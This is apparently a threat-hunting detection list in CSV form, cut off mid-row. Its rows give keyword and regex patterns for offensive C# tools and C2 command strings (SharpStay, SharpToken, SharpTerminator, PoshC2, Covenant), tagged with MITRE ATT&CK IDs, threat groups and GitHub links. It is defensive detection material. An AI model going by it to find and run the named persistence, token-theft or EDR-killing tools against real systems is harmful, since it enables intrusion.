"*SharpSQLPwn*",".{0,1000}SharpSQLPwn.{0,1000}","offensive_tool_keyword","SharpSQLPwn","C# tool to identify and exploit weaknesses within MSSQL instances in Active Directory environments","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/lefayjey/SharpSQLPwn","1","1","N/A","N/A","1","87","17","2022-02-13T19:15:36Z","2022-01-20T19:58:07Z" "*SharpSQLPwn.exe*",".{0,1000}SharpSQLPwn\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpStay.csproj*",".{0,1000}SharpStay\.csproj.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","1","N/A","10","5","425","94","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "*SharpStay.exe*",".{0,1000}SharpStay\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","10","10","455","76","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" "*SharpStay.exe*",".{0,1000}SharpStay\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*Sharpstay.exe*",".{0,1000}Sharpstay\.exe\s.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","425","94","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "*SharpStay.sln*",".{0,1000}SharpStay\.sln.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","1","N/A","10","5","425","94","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "*SharpStay-master*",".{0,1000}SharpStay\-master.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","1","N/A","10","5","425","94","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "*Sharp-Suite.git*",".{0,1000}Sharp\-Suite\.git.{0,1000}","offensive_tool_keyword","Sharp-Suite","C# offensive tools","T1027 - T1059.001 - T1562.001 - T1136.001","TA0004 - TA0005 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite","1","0","N/A","N/A","10","1088","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "*SharpSvc.exe*",".{0,1000}SharpSvc\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpSword.csproj*",".{0,1000}SharpSword\.csproj.{0,1000}","offensive_tool_keyword","SharpSword","Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly","T1562.004 - T1059.001 - T1021.003","TA0005 - TA0002","N/A","N/A","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","8","10","114","12","2023-08-22T20:16:28Z","2021-07-15T14:50:05Z" "*SharpSword.exe*",".{0,1000}SharpSword\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Read the contents of DOCX files using Cobalt Strike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","10","10","114","12","2023-08-22T20:16:28Z","2021-07-15T14:50:05Z" "*SharpSword.exe*",".{0,1000}SharpSword\.exe.{0,1000}","offensive_tool_keyword","SharpSword","Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly","T1562.004 - T1059.001 - T1021.003","TA0005 - TA0002","N/A","N/A","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","8","10","114","12","2023-08-22T20:16:28Z","2021-07-15T14:50:05Z" "*SharpSword.sln*",".{0,1000}SharpSword\.sln.{0,1000}","offensive_tool_keyword","SharpSword","Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly","T1562.004 - T1059.001 - T1021.003","TA0005 - TA0002","N/A","N/A","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","8","10","114","12","2023-08-22T20:16:28Z","2021-07-15T14:50:05Z" "*SharpSword-main.*",".{0,1000}SharpSword\-main\..{0,1000}","offensive_tool_keyword","SharpSword","Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly","T1562.004 - T1059.001 - T1021.003","TA0005 - TA0002","N/A","N/A","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","8","10","114","12","2023-08-22T20:16:28Z","2021-07-15T14:50:05Z" "*SharpSystemTriggers.git*",".{0,1000}SharpSystemTriggers\.git.{0,1000}","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","10","5","408","52","2023-08-19T22:45:20Z","2021-09-12T18:18:15Z" "*SharpSystemTriggers.sln*",".{0,1000}SharpSystemTriggers\.sln.{0,1000}","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","10","5","408","52","2023-08-19T22:45:20Z","2021-09-12T18:18:15Z" "*SharpSystemTriggers-main*",".{0,1000}SharpSystemTriggers\-main.{0,1000}","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","10","5","408","52","2023-08-19T22:45:20Z","2021-09-12T18:18:15Z" "*SharpTask.exe*",".{0,1000}SharpTask\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*sharptelnet *",".{0,1000}sharptelnet\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*SharpTemplateResources/cmd/*",".{0,1000}SharpTemplateResources\/cmd\/.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1099","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*SharpTerminator.exe*",".{0,1000}SharpTerminator\.exe.{0,1000}","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","3","289","59","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z" "*SharpTerminator.git*",".{0,1000}SharpTerminator\.git.{0,1000}","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","3","289","59","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z" "*SharpTerminator.sln*",".{0,1000}SharpTerminator\.sln.{0,1000}","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","3","289","59","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z" "*SharpTerminator-main.zip*",".{0,1000}SharpTerminator\-main\.zip.{0,1000}","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","3","289","59","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z" "*SharpToken* add_user*",".{0,1000}SharpToken.{0,1000}\sadd_user.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","0","N/A","N/A","4","381","50","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z" "*SharpToken* delete_user*",".{0,1000}SharpToken.{0,1000}\sdelete_user.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","0","N/A","N/A","4","381","50","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z" "*SharpToken* enableUser *",".{0,1000}SharpToken.{0,1000}\senableUser\s.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","0","N/A","N/A","4","381","50","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z" "*SharpToken* list_token*",".{0,1000}SharpToken.{0,1000}\slist_token.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","0","N/A","N/A","4","381","50","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z" "*SharpToken* tscon *",".{0,1000}SharpToken.{0,1000}\stscon\s.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","0","N/A","N/A","4","381","50","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z" "*SharpToken.csproj*",".{0,1000}SharpToken\.csproj.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","1","N/A","N/A","4","381","50","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z" "*SharpToken.exe*",".{0,1000}SharpToken\.exe.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1592","204","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z" "*SharpToken.exe*",".{0,1000}SharpToken\.exe.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","1","N/A","N/A","4","381","50","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z" "*SharpToken.git*",".{0,1000}SharpToken\.git.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","1","N/A","N/A","4","381","50","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z" "*SharpToken-main.zip*",".{0,1000}SharpToken\-main\.zip.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","1","N/A","N/A","4","381","50","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z" "*SharpUnhooker.*",".{0,1000}SharpUnhooker\..{0,1000}","offensive_tool_keyword","SharpUnhooker","C# Based Universal API Unhooker","T1055.012 - T1070.004 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GetRektBoy724/SharpUnhooker","1","1","N/A","9","4","379","76","2022-02-18T13:11:11Z","2021-05-17T01:33:38Z" "*SharpUnhooker-main*",".{0,1000}SharpUnhooker\-main.{0,1000}","offensive_tool_keyword","SharpUnhooker","C# Based Universal API Unhooker","T1055.012 - T1070.004 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GetRektBoy724/SharpUnhooker","1","1","N/A","9","4","379","76","2022-02-18T13:11:11Z","2021-05-17T01:33:38Z" "*SharpUp audit*",".{0,1000}SharpUp\saudit.{0,1000}","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*SharpUp.exe*",".{0,1000}SharpUp\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpUp.exe*",".{0,1000}SharpUp\.exe.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","1","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*SharpUpManager*",".{0,1000}SharpUpManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SharpUpMenu(*",".{0,1000}SharpUpMenu\(.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SharpView.exe*",".{0,1000}SharpView\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpView.exe*",".{0,1000}SharpView\.exe.{0,1000}","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","1","N/A","10","10","921","179","2024-03-22T16:34:09Z","2018-07-24T21:15:04Z" "*SharpView\SharpView*",".{0,1000}SharpView\\SharpView.{0,1000}","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","0","N/A","10","10","921","179","2024-03-22T16:34:09Z","2018-07-24T21:15:04Z" "*SharpView-master*",".{0,1000}SharpView\-master.{0,1000}","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","1","N/A","10","10","921","179","2024-03-22T16:34:09Z","2018-07-24T21:15:04Z" "*sharpweb all*",".{0,1000}sharpweb\sall.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*SharpWebManager.cs*",".{0,1000}SharpWebManager\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SharpWebServer.exe*",".{0,1000}SharpWebServer\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpWifiGrabber.exe*",".{0,1000}SharpWifiGrabber\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*sharpwmi action=*",".{0,1000}sharpwmi\saction\=.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*SharpWMI.exe*",".{0,1000}SharpWMI\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - 